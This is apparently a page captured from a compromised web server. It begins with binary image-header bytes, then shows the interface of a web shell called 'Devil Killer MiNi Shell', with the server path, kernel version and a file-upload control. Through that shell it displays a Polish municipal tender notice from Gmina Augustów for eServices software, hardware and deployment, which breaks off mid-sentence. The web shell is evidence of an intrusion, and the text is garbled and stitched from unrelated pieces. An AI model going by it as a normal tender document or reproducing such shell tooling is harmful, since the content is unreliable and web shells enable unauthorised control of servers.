JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211109/0026267601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa oprogramowania eUsług oraz sprzętu wraz z usługą wdrożenia dla Gminy Augustów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA AUGUSTÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 790670929</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mazurska 1C,</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Augustów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">87 643 30 56</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">87 643 29 03</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina-augustow@gmina-augustow.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gmina-augustow.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa oprogramowania eUsług oraz sprzętu wraz z usługą wdrożenia dla Gminy Augustów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-036d9f6e-4144-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00262676</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00006128/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup oprogramowania oraz sprzetu komputerowego do projektu E-obywatel w gminie Augustów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Współfinansowanie niniejszego zamówienia: w ramach realizowanego projektu &#34;EObywatel w Gminie Augustów&#34; w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2014-2020, nr RPO.08.01.00-20-0070/20. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.ug.augustow.wrotapodlasia.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">gminaaugustow@gminaaugustow.eu, https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w tym<br/>składanie ofert, oświadczeń, wniosków, pytań do SWZ, zawiadomień oraz innych informacji, odbywa<br/>się przy użyciu środków komunikacji elektronicznej, za pomocą miniPortalu, który dostępny jest pod<br/>adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod<br/>adresem:https://epuap.gov.pl/wps/portal oraz poczty elektronicznej.2. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do<br/>złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP). 5. Za datę przekazania oferty,<br/>wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. 6.<br/>Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej<br/>SWZ. 7. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert): opisana została szczegółowo w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej &#34;RODO&#34;) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Augustów, ul. Mazurska 1c, 16-300<br/>Augustów;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod<br/>adresem e-mail: e.pszczola@gmina-augustow.eu<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w<br/>trybie przetargu nieograniczonego.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych ustawy P.Z.P., związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może<br/>naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których AK.271.2.2021 „Rozbudowa i przebudowa budynku Ochotniczej<br/>Straży Pożarnej Jabłońskie” str. 4 mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania<br/>nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne<br/>względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; 10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OI.271.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest Dostawa oprogramowania eUsług oraz sprzętu wraz z usługą<br/>wdrożenia dla Gminy Augustów. Szczegółowy opis przedmiotu zamówienia stanowi Załącznik<br/>Nr 2 i 10 do SWZ.<br/>2. Wykonawca dostarczy harmonogram rzeczowo-finansowy (zwany dalej harmonogramem) w<br/>terminie 5 dni od udzielenia zamówienia do akceptacji Zamawiającego. Zamawiający w terminie<br/>3 dni roboczych dokona akceptacji harmonogramu lub przekaże uwagi Wykonawcy. Wykonawca<br/>w terminie 3 dni roboczych od otrzymania uwag przedstawi Zamawiającemu do zatwierdzenia<br/>zmodyfikowany harmonogram.<br/>3. Jeśli w dokumentach składających się na opis przedmiotu zamówienia, wskazany jest<br/>konkretny materiał, wyrób lub urządzenie, lub odniesienie do konkretnej normy należy to<br/>traktować jako wytyczną techniczno-jakościową i Zamawiający w odniesieniu do wskazanych<br/>wprost w dokumentacji parametrów, danych, norm (technicznych lub jakichkolwiek innych),<br/>identyfikujących pośrednio lub bezpośrednio materiał, wyrób lub urządzenie dopuszcza<br/>rozwiązania równoważne zgodne z danymi technicznymi i parametrami oraz normami zawartymi<br/>w w/w dokumentacji. Jako rozwiązania równoważne, należy rozumieć rozwiązania<br/>charakteryzujące się parametrami nie gorszymi od wymaganych w dokumentacji (OPZ),<br/>funkcjonalnie możliwe do zastosowania w przedmiocie zamówienia.<br/>4. Wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że<br/>oferowane przez niego rozwiązanie spełnia wymagania określone przez Zamawiającego. W<br/>takim przypadku, Wykonawca załącza do oferty wykaz rozwiązań równoważnych wraz z jego<br/>opisem lub normami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">48220000-6 - Pakiety oprogramowania dla internetu i intranetu</p> <p class="mb-0">48420000-8 - Pakiety oprogramowania do zarządzania urządzeniami i zestawy pakietów oprogramowania</p> <p class="mb-0">48422000-2 - Zestawy pakietów oprogramowania</p> <p class="mb-0">48442000-8 - Pakiety oprogramowania do systemów finansowych</p> <p class="mb-0">48600000-4 - Pakiety oprogramowania dla baz danych i operacyjne</p> <p class="mb-0">48820000-2 - Serwery</p> <p class="mb-0">48900000-7 - Różne pakiety oprogramowania i systemy komputerowe</p> <p class="mb-0">72000000-5 - Usługi informatyczne: konsultacyjne, opracowywania oprogramowania, internetowe i wsparcia</p> <p class="mb-0">72211000-7 - Usługi programowania oprogramowania systemowego i dla użytkownika</p> <p class="mb-0">72253200-5 - Usługi w zakresie wsparcia systemu</p> <p class="mb-0">72263000-6 - Usługi wdrażania oprogramowania</p> <p class="mb-0">80511000-9 - Usługi szkolenia personelu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane według następujących kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">45</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowy okres gwarancji na dostarczony sprzęt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">24</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowy okres gwarancji na oprogramowanie EOD, modułów SD, portalu e-Usług i usługi integracji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">24</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Użycie dla systemu e-Usług bazy danych bez limitu połączeń, bez limitu użytkowników, bez limitu liczby uruchomionych serwerów, bez limitu procesorów i RAM-u serwera na którym uruchamiana będzie baza danych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">7</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>1.1. Zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie stawia w tym zakresie szczegółowych warunków, które spełni Wykonawca.<br/>1.2. Uprawnień do wykonywania określonej działalności gospodarczej lub zawodowej, o ile<br/>wnika to z odrębnych przepisów.<br/>Zamawiający nie stawia w tym zakresie szczegółowych warunków, które spełni Wykonawca.<br/>1.3. Sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie stawia w tym zakresie szczegółowych warunków, które spełni Wykonawca.<br/>1.4. Zdolności technicznej lub zawodowej.<br/>1.4.1. Wykonawca wykaże, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, należycie zrealizował minimum dwa zamówienia polegające na<br/>wdrożeniu na wdrożeniu Systemu Dziedzinowego, o wartości nie mniejszej niż 150 000 zł brutto<br/>(sto pięćdziesiąt tysięcy złotych) każde.<br/>Uwaga: W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunek zostanie<br/>spełniony, jeżeli co najmniej jeden z Wykonawców zrealizował dwa zamówienia w wyżej<br/>opisanym zakresie.<br/>1.4.2. Wykonawca wykaże, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, należycie zrealizował minimum dwa zamówienia polegające na<br/>szkoleniu co najmniej 15 użytkowników z systemów objętych wdrożeniem.<br/>1.4.3. Wykonawca wykaże, że dysponuje lub będzie dysponował osobami odpowiedzialnymi za<br/>realizację zamówienia w tym:<br/>1.4.3.1. Kierownik / Koordynator Zespołu Wykonawcy, posiadający wykształcenie wyższe oraz<br/>certyfikat co najmniej Prince2 Foundation lub równoważny (za równoważny zostanie uznany<br/>certyfikat, który potwierdzi umiejętność stosowania jakichkolwiek opisanych i powszechnie<br/>dostępnych metodyk zarządzania projektami informatycznymi). Osoba ta musi mieć<br/>doświadczenie w zarządzaniu projektami w zakresie odpowiadającym przedmiotowi<br/>zamówienia, potwierdzone udziałem w co najmniej 2 projektach dotyczących wdrożeń Systmów<br/>dziedzinowych o wartości min. 150 000,00 zł brutto (sto pięćdziesiąt tysięcy złotych) każdy.<br/>1.4.3.2. Analityk posiadający wykształcenie wyższe oraz wiedzę i doświadczenie w planowaniu wdrażania systemów informatycznych, tj. posiada certyfikat OMG BPM lub TOGAF lub<br/>równoważny w odpowiednim zakresie (za równoważny zostanie uznany certyfikat, który<br/>potwierdzi umiejętność stosowania jakichkolwiek opisanych i powszechnie dostępnych metodyk<br/>projektowania systemów informatycznych) oraz uczestniczył w realizacji co najmniej 2 projektów<br/>o wartości min. 100 000,00 zł brutto (sto tysięcy złotych) każdy – w zakresie wdrożenia systemu<br/>dziedzinowego.<br/>1.4.3.3. Programista posiadający doświadczenie w tworzeniu rozwiązań Systemów<br/>dziedzinowych, tj. udział w minimum 2 projektach w ramach których przeprowadzono wdrożenie<br/>systemów dziedzinowych, każdy projekt na kwotę minimum 100 000 zł brutto (sto tysięcy<br/>złotych). Wskazana osoba musi uczestniczyć w procesie tworzenia oprogramowania oraz w<br/>procesie utrzymania systemów w okresie pełnienia serwisu przez Wykonawcę.<br/>1.4.3.4. Wykładowcy - co najmniej 1 osoba posiadająca minimum roczne doświadczenie<br/>zawodowe w zakresie szkoleń użytkowników zaoferowanego systemu dziedzinowego (tj.<br/>prowadzenia szkolenia specjalistyczne w zakresie systemów dziedzinowych z zakresu<br/>postępowania) w liczbie co najmniej 2 szkoleń dla jednostek administracji publicznej.<br/>Uwaga! Zamawiający nie dopuszcza pełnienia kilku funkcji (więcej niż jednej) z wymienionych<br/>powyżej przez tą samą osobę.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, spełnianie<br/>warunków Wykonawcy wykazują łącznie.<br/>3. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu w<br/>stosownych sytuacjach oraz w odniesieniu do zamówienia, lub jego części, polegać na<br/>zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie<br/>od charakteru prawnego łączących go z nimi stosunków prawnych;<br/>4. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub<br/>sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w<br/>danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.Wykonawca na podstawie art. 125 ust. 1 ustawy Pzp zobowiązany jest złożyć wraz z ofertą<br/>oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu – wzór<br/>stanowi Załącznik Nr 3 i 4 do SWZ; 1.1.w przypadku wspólnego ubiegania się o zamówienie przez<br/>Wykonawców, oświadczenie, o którym mowa w ust. 1 składa każdy z Wykonawców;1.2.w przypadku<br/>polegania na zdolnościach podmiotu udostępniającego zasoby, Wykonawca przedstawia także<br/>oświadczenie tego podmiotu, potwierdzające brak podstaw wykluczenia oraz odpowiednio spełnianie<br/>warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby;1.3.w<br/>przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dołączają oni do oferty<br/>oświadczenie, o którym mowa w 